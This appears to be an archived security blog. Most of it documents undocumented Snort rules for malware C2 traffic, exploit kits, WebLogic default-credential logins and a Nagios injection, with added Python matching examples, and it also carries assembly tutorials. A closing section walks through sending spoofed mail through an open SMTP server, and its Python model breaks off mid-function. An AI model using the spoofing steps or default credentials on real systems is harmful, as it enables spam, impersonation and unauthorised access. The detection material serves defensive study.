Monday, December 26, 2016

1:41083 BLACKLIST suspicious .bit dns query

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created this DNS query blacklist alert didn't include documentation.

(1:41083) BLACKLIST suspicious .bit dns query

alert udp $HOME_NET any -> any 53 (msg:"BLACKLIST suspicious .bit dns query"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|03|bit|00|"; fast_pattern:only; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service dns; classtype:trojan-activity; sid:41083; rev:1; )


If I had to guess, I think it's related to the .bit TLD or something similar, which stated:

Per the reddit post: The advantage to owning a .bit domain is that no government or third party can have your DNS interrupted; it is truly a P2P DNS system with no possibility of censorship.
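To see what the two options in sid 41083 actually test, here is an added example (my own code, not from the original post or from the rule's author) that builds a constructed DNS query and applies the same checks: byte_test:1,!&,0xF8,2 requires QR=0 and OPCODE=0 in the flags byte at offset 2 (a standard query, not a response), and content:"|03|bit|00|" is a 3-byte label "bit" followed by the root label, i.e. a name ending in .bit. The function names and the nocase switch are mine.

```python
import struct

# Constructed DNS packets only; nothing is sent on the network.


def build_dns_query(qname: str, txid: int = 0x1234, flags: int = 0x0100) -> bytes:
    """Build a minimal DNS question for an A record (constructed sample input)."""
    labels = b"".join(
        bytes([len(part)]) + part.encode("ascii") for part in qname.split(".") if part
    )
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)  # QDCOUNT=1
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_qname(payload: bytes, offset: int = 12):
    """Walk the label sequence of the first question; return (labels, next_offset)."""
    labels = []
    while True:
        if offset >= len(payload):
            raise ValueError("truncated QNAME")
        length = payload[offset]
        if length == 0:
            return labels, offset + 1
        if length & 0xC0:  # compression pointers do not belong in a question name
            raise ValueError("unexpected label pointer")
        offset += 1
        labels.append(payload[offset:offset + length].decode("ascii", "replace"))
        offset += length


def is_suspicious_bit_query(payload: bytes, nocase: bool = False) -> bool:
    """Mirror of sid 41083: a standard query whose QNAME ends in the "bit" TLD.

    byte_test:1,!&,0xF8,2  -> none of the top five bits of the flags byte at
                              offset 2 may be set: QR=0 (a query, not a
                              response) and OPCODE=0 (standard query).
    content:"|03|bit|00|"  -> a 3-byte label "bit" followed by the root label,
                              which a label walk sees as the last label.
    The rule carries no nocase, so it is case-sensitive; DNS names are not,
    which is why this function offers a nocase switch (my addition).
    """
    if len(payload) < 12:
        return False
    if payload[2] & 0xF8:
        return False
    try:
        labels, _ = parse_qname(payload)
    except ValueError:
        return False
    if not labels:
        return False
    tld = labels[-1].lower() if nocase else labels[-1]
    return tld == "bit"


if __name__ == "__main__":
    for name in ("example.bit", "bit.example.com", "EXAMPLE.BIT"):
        print(name, is_suspicious_bit_query(build_dns_query(name)))
```

A query for EXAMPLE.BIT slips past the rule as written because the content match is case-sensitive, which is the kind of gap a nocase modifier would close.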

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1:41088 MALWARE-CNC Win.Trojan.MrWhite Win.Trojan.Ostap out bound communication attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created these trojan connection attempt snort alerts didn't include documentation.

(1:41089) MALWARE-CNC Win.Trojan.Ostap out bound communication attempt

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Ostap out bound communication attempt"; flow:to_server,established; content:"/ostap.php"; fast_pattern:only; http_uri; content:"/ostap.php"; depth:20; offset:2; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:41089; rev:1; )

(1:41088) MALWARE-CNC Win.Trojan.MrWhite out bound communication attempt

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.MrWhite out bound communication attempt"; flow:to_server,established; content:"/GOLD/bender.php"; http_uri; content:"User-Agent: Mr.White|0D 0A|"; fast_pattern:only; http_header; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:41088; rev:1; )


If I had to guess, I think it's related to this JScript backdoor or something similar, which stated:

Per the article, MrWhite can profile the victim systems for the presence of running POS software before dropping further POS payloads. It is related to a financially-motivated threat actor group with access to banking Trojans and other malware, including Dridex, Ursnif, Tinba, and the point-of-sale (POS) malware AbaddonPOS with its loader, TinyLoader.


1:41035 1:41084 EXPLOIT-KIT Sundown Exploit Kit redirection attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created these exploit kit alerts didn't include documentation.

(1:41035) EXPLOIT-KIT Sundown Exploit Kit redirection attempt

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"EXPLOIT-KIT Sundown Exploit Kit redirection attempt"; flow:established,to_server; content:"/noone.php"; depth:10; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:41035; rev:1; )

(1:41084) EXPLOIT-KIT Sundown Exploit kit landing page obfuscation detected

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"EXPLOIT-KIT Sundown Exploit kit landing page obfuscation detected"; flow:to_client,established; file_data; content:"|22|script|22|"; nocase; content:"|22|createE|22|"; within:50; nocase; content:"|22|lement|22|"; within:20; nocase; content:"|22|type|22|"; within:50; nocase; content:"|22|text/j|22|"; within:50; nocase; content:"|22|avascript|22|"; within:50; nocase; metadata:policy max-detect-ips drop, policy security-ips drop, service http; classtype:attempted-user; sid:41084; rev:1; )


If I had to guess, I think it's related to the Sundown Exploit Kit or something similar, which stated:

Per the article, it is composed of a couple of parts: a landing page and an exploit page with a payload. The landing page probes the user's system to determine if it is potentially vulnerable and then delivers an exploit page with a malicious payload.
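Sid 41084 is a chain of six quoted string fragments, each required to appear within N bytes of the previous one, which is how split-string obfuscation of createElement("script") / type="text/javascript" looks on the wire. Here is an added example (my own model of Snort's content/within chaining, not Snort's engine and not code from the original post) that runs the chain over two constructed response bodies; the sample pages and function names are mine.

```python
# (pattern, within): |22| in the rule is a double quote, so each pattern is the
# quoted fragment; None means the first content is searched from the buffer start.
SUNDOWN_CHAIN = [
    (b'"script"', None),
    (b'"createE"', 50),
    (b'"lement"', 20),
    (b'"type"', 50),
    (b'"text/j"', 50),
    (b'"avascript"', 50),
]


def find_nocase(data: bytes, needle: bytes, start: int, end: int) -> int:
    """Case-insensitive search for needle fully inside data[start:end]; -1 if absent."""
    idx = data[start:end].lower().find(needle.lower())
    return -1 if idx < 0 else start + idx


def match_chain(data: bytes, chain, cursor: int = 0, step: int = 0) -> bool:
    """Evaluate the chain with backtracking: if a later content is not found
    inside its 'within' window, retry from the next occurrence of the earlier
    content instead of giving up (Snort re-evaluates relative options this way)."""
    if step == len(chain):
        return True
    pattern, within = chain[step]
    end = len(data) if within is None else min(len(data), cursor + within)
    pos = find_nocase(data, pattern, cursor, end)
    while pos >= 0:
        if match_chain(data, chain, pos + len(pattern), step + 1):
            return True
        pos = find_nocase(data, pattern, pos + 1, end)
    return False


def is_sundown_obfuscated(file_data: bytes) -> bool:
    """Mirror of sid 41084 over the file_data buffer (the HTTP response body)."""
    return match_chain(file_data, SUNDOWN_CHAIN)


# Constructed samples: the split-string pattern the rule targets, and an
# unobfuscated script loader that must not fire.
OBFUSCATED = (b'var t="script";var e=document["createE"+"lement"](t);'
              b'e["type"]="text/j"+"avascript";')
PLAIN = b'var e=document.createElement("script");e.type="text/javascript";'

if __name__ == "__main__":
    print(is_sundown_obfuscated(OBFUSCATED), is_sundown_obfuscated(PLAIN))
```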


1:41034 MALWARE-CNC Win.Trojan.Sality variant outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created these trojan connection attempt snort alerts didn't include documentation.

(1:41034) MALWARE-CNC Win.Trojan.Sality variant outbound connection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Sality variant outbound connection"; flow:to_server,established; content:"/images/image.gif"; fast_pattern:only; http_uri; content:"User-Agent|3A 20|"; depth:12; http_header; content:!"proxy"; nocase; http_header; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,virustotal.com/en/file/22fc19a6d9e0ef40812d05c357beabfed6f7cb9fe72af826947acb458b911213/analysis/; classtype:trojan-activity; sid:41034; rev:1; )


If I had to guess, I think it's related to this Sality gambling campaign or something similar, which stated:

It appears the image.gif callouts download the real payload. The article also mentions that Sality has incorporated the use of rootkit functions as part of the malware family's ongoing evolution, and that Sality was found to deliver fake-AV malware as the final payload, able to infect not only local drives but also USB devices and network folders.
The VirusTotal link above shows many solid hits for Win32/Sality.


1:41033 MALWARE-CNC Win.Trojan.Proteus outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created these trojan connection attempt snort alerts didn't include documentation.

(1:41033) MALWARE-CNC Win.Trojan.Proteus outbound connection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Proteus outbound connection"; flow:to_server,established; content:"/api/register"; fast_pattern:only; http_uri; content:"{|22|m|22|:|22 5C 5C|"; depth:8; http_client_body; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,virustotal.com/en/file/d23b4a30f6b1f083ce86ef9d8ff434056865f6973f12cb075647d013906f51a2/analysis/; classtype:trojan-activity; sid:41033; rev:1; )


If I had to guess, I think it's related to this link (found via the VirusTotal comments) on the Proteus botnet or something similar, which stated:

It appears to make callouts to an API on the C&C server, and it appears to have keylogger capabilities among other things.
The VirusTotal link above shows several generic hits like Trojan.KeyLogger, TrojanDropper.Dapato, Win32.Trojan.WisdomEyes, Trojan.Dynamer, etc.


1:41031 MALWARE-CNC Win.Trojan.Athena variant outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created these trojan connection attempt snort alerts didn't include documentation.

(1:41031) MALWARE-CNC Win.Trojan.Athena variant outbound connection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Athena variant outbound connection"; flow:to_server,established; content:"User-Agent: Go-http-client"; fast_pattern:only; http_header; content:"/cmd/"; depth:5; http_uri; pcre:"/^\x2Fcmd\x2F[\-a-zA-Z0-9_+]{650,}={0,3}/U"; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,www.virustotal.com/en/file/af385c983832273390bb8e72a9617e89becff2809a24a3c76646544375f21d14/analysis/; classtype:trojan-activity; sid:41031; rev:1; )


If I had to guess, I think it's related to this malware analysis of a file called msguard.exe or something similar, which stated:

It appears to make callouts to .onion addresses with cmd parameters that are likely sending information to, or receiving it from, a C&C server.
The VirusTotal link above shows several generic hits like Win.Trojan.Athena, W32.Clodece.Trojan, Trojan.Dynamer, Trojan.Razy, etc.


Wednesday, December 14, 2016

1:40912 1:40913 MALWARE-OTHER Win.Trojan.Flokibot variant download attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created these trojan download attempt snort alerts didn't include documentation.

(1:40913) MALWARE-OTHER Win.Trojan.Flokibot variant download attempt

alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (msg:"MALWARE-OTHER Win.Trojan.Flokibot variant download attempt"; flow:to_server,established; file_data; content:"Hash: 0x%x not loaded."; fast_pattern:only; content:"|00|B|00|O|00|T|00|3|00|2|00|"; nocase; content:"|00|K|00|E|00|Y|00|"; nocase; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service smtp; reference:url,virustotal.com/en/file/0aa1f07a2ebcdd42896d3d8fdb5e9a9fef0f4f894d2501b9cbbe4cbad673ec03/analysis/; classtype:trojan-activity; sid:40913; rev:1; )

(1:40912) MALWARE-OTHER Win.Trojan.Flokibot variant download attempt

alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (msg:"MALWARE-OTHER Win.Trojan.Flokibot variant download attempt"; flow:to_client,established; file_data; content:"Hash: 0x%x not loaded."; fast_pattern:only; content:"|00|B|00|O|00|T|00|3|00|2|00|"; nocase; content:"|00|K|00|E|00|Y|00|"; nocase; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service ftp-data, service http, service imap, service pop3; reference:url,virustotal.com/en/file/0aa1f07a2ebcdd42896d3d8fdb5e9a9fef0f4f894d2501b9cbbe4cbad673ec03/analysis/; classtype:trojan-activity; sid:40912; rev:1; )


If I had to guess, I think it's related to the Sednit hacking group and perhaps a rootkit they developed or something similar, which stated:

Floki Bot is a malware variant that has recently been offered for sale on various darknet markets. It is based on the same codebase that was used by the infamous Zeus trojan. Floki Bot claims to feature several new capabilities making it an attractive tool for criminals. Talos also observed the introduction of new code that allows Floki Bot to make use of the Tor network.
Malwarebytes also has a good write-up on the malware.
The VirusTotal link above shows several generic hits like Win.Trojan.Flokibot, Trojan-Spy.Zbot, Trojan.Win32.DownLoader, etc.


1:40911 MALWARE-CNC Win.Rootkit.Sednit variant outbound connection attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created this Sednit rootkit alert didn't include documentation.

(1:40911) MALWARE-CNC Win.Rootkit.Sednit variant outbound connection attempt

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Rootkit.Sednit variant outbound connection attempt"; flow:to_server,established; urilen:11; content:"/search.php"; fast_pattern:only; http_uri; content:"as_ft="; http_client_body; content:"as_q="; http_client_body; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:url,virustotal.com/en/file/471fbdc52b501dfe6275a32f89a8a6b02a2aa9a0e70937f5de610b4185334668/analysis/1480953133/; classtype:trojan-activity; sid:40911; rev:1; )


If I had to guess, I think it's related to the Sednit hacking group and perhaps a rootkit they developed or something similar, which stated:

the notorious Sednit hacking group which has targeted over 1000 high-profile individuals with phishing attacks and zero-day exploits. The Sednit gang, also known as APT28, Fancy Bear, Pawn Storm and Sofacy, are highly experienced, and have been engaged in criminal activity since at least 2004. They have developed sophisticated attacks that bypass the typical network security at compromised organizations.
Another blog mentioned: The obvious goal of the SEDNIT-related spyware is to steal personal data, record audio, make screenshots, and send them to a remote command-and-control (C&C) server.
The VirusTotal link above shows several generic hits like TROJ_SEDNIT, Rootkit.BlackEnergy, Trojan-Dropper.Win32.Agent, etc.


1:40910 MALWARE-CNC Win.Trojan.Locky variant outbound connection attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created this Locky ransomware alert didn't include documentation.

(1:40910) MALWARE-CNC Win.Trojan.Locky variant outbound connection attempt

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Trojan.Locky variant outbound connection attempt"; flow:to_server,established; urilen:16; content:"POST"; http_method; content:"/information.cgi"; depth:16; fast_pattern; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; classtype:trojan-activity; sid:40910; rev:1; )


If I had to guess, I think it's related to Locky's massive spray-and-pray spam campaign or something similar, which stated:

The encrypting malware then goes on to connect to a number of hard-coded IP addresses whose purpose is to enroll the affected computer into a botnet: http://xxxxxx / information.cgi ....


1:40906 MALWARE-CNC Win.Malware.Disttrack variant outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created this Disttrack malware snort alert didn't include documentation.

(1:40906) MALWARE-CNC Win.Malware.Disttrack variant outbound connection

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC Win.Malware.Disttrack variant outbound connection"; flow:to_server,established; content:"/category/page.php"; http_uri; content:"shinu="; fast_pattern:only; http_uri; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, service http; reference:url,virustotal.com/en/file/61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842/analysis/; classtype:trojan-activity; sid:40906; rev:1; )


If I had to guess, I think it's related to the Disttrack malware that spreads across the network destroying data or something similar, which stated:

Disttrack is a multipurpose tool that exhibits worm-like behavior by attempting to spread to other systems on a local network using stolen administrator credentials. More importantly, its claim to fame is the ability to destroy data and to render infected systems unusable. The data in “shinu” parameter is a combination of the system’s tickcount, local IP address, operating system version, keyboard layout and the contents of %WINDOWS%\inf\netimm173.pnf. The C2 server can respond to this HTTP request
The VirusTotal link provided has hits for things such as Trojan/Win32.DistTrack, DistTrack!comm, etc.


1:40905 SERVER-WEBAPP Oracle Weblogic default credentials login attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created this default credential alert didn't include documentation.

(1:40905) SERVER-WEBAPP Oracle Weblogic default credentials login attempt

alert tcp $EXTERNAL_NET any -> $HOME_NET 7001 (msg:"SERVER-WEBAPP Oracle Weblogic default credentials login attempt"; flow:to_server,established; content:"/j_security_check"; fast_pattern:only; http_uri; content:"j_username="; http_client_body; content:"j_password=weblogic"; http_client_body; pcre:"/j_username=(root|system)/P"; metadata:policy balanced-ips drop, policy security-ips drop, service http; classtype:attempted-admin; sid:40905; rev:1; )

(1:40904) SERVER-WEBAPP Oracle Weblogic default credentials login attempt

alert tcp $EXTERNAL_NET any -> $HOME_NET 7001 (msg:"SERVER-WEBAPP Oracle Weblogic default credentials login attempt"; flow:to_server,established; content:"/j_security_check"; fast_pattern:only; http_uri; content:"j_username=weblogic"; http_client_body; content:"j_password"; http_client_body; pcre:"/j_password=(welcome1|weblogic|admin)/P"; metadata:policy balanced-ips drop, policy security-ips drop, service http; classtype:attempted-admin; sid:40904; rev:1; )


If I had to guess, I think it's related to Oracle's documentation on default credentials for WebLogic or something similar, which stated:

In the tutorial the username is weblogic and the password is Welcome1.


1:40991 MALWARE-CNC Linux.DDoS.D93 outbound connection

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created this DDoS snort alert didn't include documentation.

(1:40991) MALWARE-CNC Linux.DDoS.D93 outbound connection

alert tcp $HOME_NET any -> $EXTERNAL_NET 31337 (msg:"MALWARE-CNC Linux.DDoS.D93 outbound connection"; flow:to_server; content:"|4E 0F 42 07 27|"; depth:5; dsize:25; metadata:impact_flag red, policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:url,www.virustotal.com/en/file/2c017c94d9f40cba9a20e92c7c636e98de15c599bf004fa06508d701ab9e3068/analysis/; classtype:trojan-activity; sid:40991; rev:1; )


If I had to guess, I think it's related to this article on Linux.DDoS.93 or something similar, which stated:

Crooks are hijacking devices running Linux-based operating systems and use them to launch DDoS attacks at their behest. Dr.Web security researchers say the trojan seems to infect Linux machines via the Shellshock vulnerability, still unpatched in a large number of devices.

The VirusTotal link in the alert above has hits for Linux.DDoS.93, Linux.DDOS.Flood.W, etc.


1:41018 1:41019 SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt

I previously wrote about documentation-less snort rules. Below is my attempt to fill in some of those gaps.

Whoever created these two new SQL injection snort alerts for Nagios didn't include documentation.

(1:41019) SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt"; flow:to_server,established; content:"nagiosxi/includes/components/nagiosim/nagiosim.php"; fast_pattern:only; http_uri; content:"host="; nocase; http_uri; pcre:"/[?&]host=[^&]*?([\x60\x3b\x7c]|\x24\x28)/Ui"; metadata:policy security-ips drop, service http; classtype:web-application-attack; sid:41019; rev:1; )

(1:41018) SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt"; flow:to_server,established; content:"nagiosxi/includes/components/nagiosim/nagiosim.php"; fast_pattern:only; http_uri; content:"host="; nocase; http_raw_uri; content:"%26"; distance:0; http_raw_uri; pcre:"/[?&]host=[^&]*?%26/Ii"; metadata:policy security-ips drop, service http; classtype:web-application-attack; sid:41018; rev:1; )


If I had to guess, I think it's related to this disclosure or something similar, which stated:

The ‘host’ and ‘service’ GET parameters in the ‘nagiosim.php’ page are vulnerable to SQL injection via error-based payloads
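The interesting detail in this pair is the buffer each pcre runs on: /U (sid 41019) is the normalized URI, where %XX escapes are already decoded, while /I (sid 41018) is the raw URI, where a literal %26 is still visible. Here is an added example (my own code, not from the original post or from the rule authors) that applies both patterns to constructed request URIs; percent-decoding with urllib stands in for Snort's HTTP normalization, and the function names are mine.

```python
import re
from urllib.parse import unquote

NAGIOSIM_PATH = "nagiosxi/includes/components/nagiosim/nagiosim.php"

# sid 41019: pcre with /U runs on the normalized URI and looks for a backtick,
# ';', '|' or '$(' (shell metacharacters) inside the host value.
NORMALIZED_RE = re.compile(r"[?&]host=[^&]*?([\x60\x3b\x7c]|\x24\x28)", re.I)
# sid 41018: pcre with /I runs on the raw URI and looks for a literal "%26".
# After normalization "%26" becomes "&", which the [^&]*? in the rule above
# treats as the end of the host value, so the encoded ampersand is only
# visible in the raw buffer; that is why the second rule exists.
RAW_RE = re.compile(r"[?&]host=[^&]*?%26", re.I)


def normalize_uri(raw_uri: str) -> str:
    """Stand-in for Snort's http_uri normalization: decode %XX escapes only."""
    return unquote(raw_uri)


def check_nagiosim_request(raw_uri: str):
    """Return the sids (41019 and/or 41018) a request to nagiosim.php would trigger."""
    hits = []
    normalized = normalize_uri(raw_uri)
    if NAGIOSIM_PATH not in normalized:        # both rules' fast_pattern content
        return hits
    if "host=" in normalized.lower() and NORMALIZED_RE.search(normalized):
        hits.append(41019)
    if "host=" in raw_uri.lower() and RAW_RE.search(raw_uri):
        hits.append(41018)
    return hits


if __name__ == "__main__":
    # Constructed URIs, not captured traffic.
    base = "/nagiosxi/includes/components/nagiosim/nagiosim.php?"
    for q in ("host=localhost", "host=localhost%60id%60", "host=localhost%26service=x"):
        print(q, check_nagiosim_request(base + q))
```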


Documentation-less Snort Rules

Has anybody else noticed that what seems like the majority of new snort rules that come out, and that you can use in an IDS (intrusion detection system) like Sourcefire, don't have any documentation? You're stuck with

Summary: This rule does not have documentation


Or, if you're lucky, some link to a VirusTotal page with no other explanation.

Well, I thought it might be interesting to try to collect some brief links or documentation around some documentation-less snort rules. I did not write the rules, and I have no insight into who did or why. I did not write the documentation either; I simply collected the information and put it in one spot, so that if you're googling why a snort rule fired and what it means, this documentation might be helpful to you. Enjoy.

Sample initial documentation I put together for the documentation-less rules:
- SERVER-WEBAPP Nagios XI Incident Manager SQL command injection attempt 41018 41019
- MALWARE-CNC Linux.DDoS.D93 outbound connection 40991
- SERVER-WEBAPP Oracle Weblogic default credentials login attempt 40905 40905
- MALWARE-CNC Win.Malware.Disttrack variant outbound connection 40906
- MALWARE-CNC Win.Trojan.Locky variant outbound connection attempt 40910
- MALWARE-CNC Win.Rootkit.Sednit variant outbound connection attempt 40911
- MALWARE-OTHER Win.Trojan.Flokibot variant download attempt 40912 40913



Saturday, September 24, 2016

Intel Assembly Basics movl , cmpl , jns

Intel Assembly Basics



Here's a simple code block, what does it do?

0x080483c1 <+6>: movl $0x15,-0x4(%ebp)
0x080483c8 <+13>: cmpl $0x0,-0x4(%ebp)
0x080483cc <+17>: jns 0x80483d5
0x080483ce <+19>: movl $0xf,-0x4(%ebp)
0x080483d5 <+26>: ...

movl is 'move long', which in this case is a 32-bit integer. Hex 0x15 is 16+5=21, so it's putting 21 into the first value on the stack (-0x4).

cmpl is 'compare long', so it's comparing 2 integers: the value 0x0, which is simply 0, and the first value on the stack (-0x4), which from the previous line we know holds 21. Compare wants to determine if the values are the same or different. It does that by subtracting 21 - 0. If the result of the subtraction is 0 then it sets the Zero Flag (ZF) to 1 (or true). If the result of the subtraction is anything else then it sets the Zero Flag (ZF) to 0 (or false). Thus in this case 21-0=21, so the Zero Flag (ZF) is set to 0 (or false). The compare instruction also sets the Sign Flag (SF) to 1 if the result is a negative number and to 0 if it's positive. In this case the result is +21, so it's positive and SF is set to 0.

jns is 'jump if not sign'. It jumps if the Sign Flag (SF) is 0 (thus if the previous compare result was positive). In this case SF was set to 0, which means the value was positive (not signed), so it's going to jump to address 0x80483d5.

movl is 'move long' again, just like above, and this time it's putting 15 into the top value on the stack (-0x4), but in this case, since we jumped, this instruction never actually gets executed.



Thus to wrap this all up, you could rewrite this code in pseudo C code as follows. Note that the compare is against 0, not 21: jns skips the assignment whenever x - 0 is non-negative, so the assignment only runs when x is negative.

int x = 21;
if (x < 0)   /* cmpl $0x0 followed by jns: fall through only when SF is set */
    x = 15;
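To check the flag logic on values other than 21, here is an added example (my own code, not from the original post) that emulates cmpl's ZF/SF on a 32-bit result and the jns decision; it makes the initial movl value a parameter (a hypothetical change, the post hard-codes 0x15) so both branch outcomes can be seen, including the wrap-around case 0x80000000, which is negative as a signed 32-bit value.

```python
MASK32 = 0xFFFFFFFF


def to_signed32(value: int) -> int:
    """Interpret a 32-bit pattern as a signed integer."""
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value


def cmpl(src: int, dst: int):
    """cmpl src, dst (AT&T operand order) computes dst - src and keeps only
    the flags. Returns (ZF, SF) for the 32-bit result."""
    result = (dst - src) & MASK32
    zf = 1 if result == 0 else 0
    sf = (result >> 31) & 1      # bit 31 of the result is the sign bit
    return zf, sf


def run_block(initial: int) -> int:
    """Emulate the four instructions from the post, with the immediate of the
    first movl replaced by `initial` (hypothetical) so the branch can go both
    ways. Returns the final value of the local at -0x4(%ebp)."""
    local = initial & MASK32            # movl $initial,-0x4(%ebp)
    _zf, sf = cmpl(0x0, local)          # cmpl $0x0,-0x4(%ebp)
    if sf == 0:                         # jns 0x80483d5: taken when SF == 0
        return to_signed32(local)       # movl $0xf is skipped
    local = 0xF                         # movl $0xf,-0x4(%ebp)
    return to_signed32(local)


if __name__ == "__main__":
    for start in (0x15, 0, -1, 0x7FFFFFFF, 0x80000000):
        print(hex(start & MASK32), "->", run_block(start))
```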



Intel Assembly Basics GCC and GDB Disassembly

Intel Assembly Basics



I want to write a C program on Linux and see what x86 assembly it generates. Let's try this.

nano increment.c

int main(){
  int x = 15;
  x++;
}


gcc -m32 -mpreferred-stack-boundary=2 -ggdb increment.c -o increment

gdb ~/increment

(gdb) disas main

Dump of assembler code for function main:
  0x080483bb <+0>: push %ebp
  0x080483bc <+1>: mov %esp,%ebp
  0x080483be <+3>: sub $0x4,%esp
  0x080483c1 <+6>: movl $0xf,-0x4(%ebp)
  0x080483c8 <+13>: addl $0x1,-0x4(%ebp)
  0x080483cc <+17>: mov $0x0,%eax
  0x080483d1 <+22>: leave
  0x080483d2 <+23>: ret
End of assembler dump.



Friday, September 16, 2016

Sending SMTP Emails

This Kali tutorial on SMTP hacking gives a simple walk-through.

If you find a vulnerable SMTP server that does not require authentication you can telnet or netcat to it on port 25.

First greet the server with HELO thedomain.com

Next start a message with the sender MAIL FROM: sendingvictim@thedomain.com

And set the recipient RCPT TO: spamvictim@somewhere.com

And start the body by typing DATA

Enter the subject with SUBJECT: my subject

Then type in the body of the email you want

Then type . and hit <ENTER> to send the email

Then get out of there with QUIT
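The exchange above, with both sides' messages, as an added example (my own code, not from the original post or the Kali tutorial): a minimal in-memory SMTP server state machine and a client that drives the HELO/MAIL/RCPT/DATA/QUIT sequence against it. The server accepts mail only for recipients in its own domains, which is the relay check that a server like the one described is missing; the class and function names, the domain names and the reply texts are constructed for this example.

```python
import re


class SmtpServer:
    """Minimal SMTP state machine for the HELO/MAIL/RCPT/DATA/QUIT exchange.

    A teaching model, not a real MTA: it accepts mail only for recipients in
    local_domains unless open_relay=True, which is the check a mis-configured
    relay is missing."""

    def __init__(self, local_domains, open_relay=False):
        self.local_domains = {d.lower() for d in local_domains}
        self.open_relay = open_relay
        self.delivered = []          # (sender, recipients, message text)
        self.helo = None
        self._reset_envelope()

    def _reset_envelope(self):
        self.sender, self.rcpts, self.in_data, self.data_lines = None, [], False, []

    def handle(self, line: str) -> str:
        """Process one client line; return the server reply ('' while in DATA)."""
        if self.in_data:
            if line == ".":
                self.delivered.append((self.sender, list(self.rcpts), "\r\n".join(self.data_lines)))
                self._reset_envelope()
                return "250 2.0.0 Ok: queued"
            self.data_lines.append(line[1:] if line.startswith("..") else line)  # un-dot-stuff
            return ""
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            self.helo = arg.strip()
            return f"250 mail.example.test Hello {self.helo}"
        if verb == "MAIL":
            if self.helo is None:
                return "503 5.5.1 Error: send HELO first"
            m = re.match(r"(?i)FROM:\s*<?([^>\s]*)>?", arg)
            if not m:
                return "501 5.5.4 Syntax: MAIL FROM:<address>"
            self._reset_envelope()
            self.sender = m.group(1)
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            if self.sender is None:
                return "503 5.5.1 Error: need MAIL command"
            m = re.match(r"(?i)TO:\s*<?([^>\s]+)>?", arg)
            if not m:
                return "501 5.5.4 Syntax: RCPT TO:<address>"
            addr = m.group(1)
            domain = addr.rpartition("@")[2].lower()
            if domain not in self.local_domains and not self.open_relay:
                return f"554 5.7.1 <{addr}>: Relay access denied"   # the anti-relay check
            self.rcpts.append(addr)
            return "250 2.1.5 Ok"
        if verb == "DATA":
            if not self.rcpts:
                return "503 5.5.1 Error: need RCPT command"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
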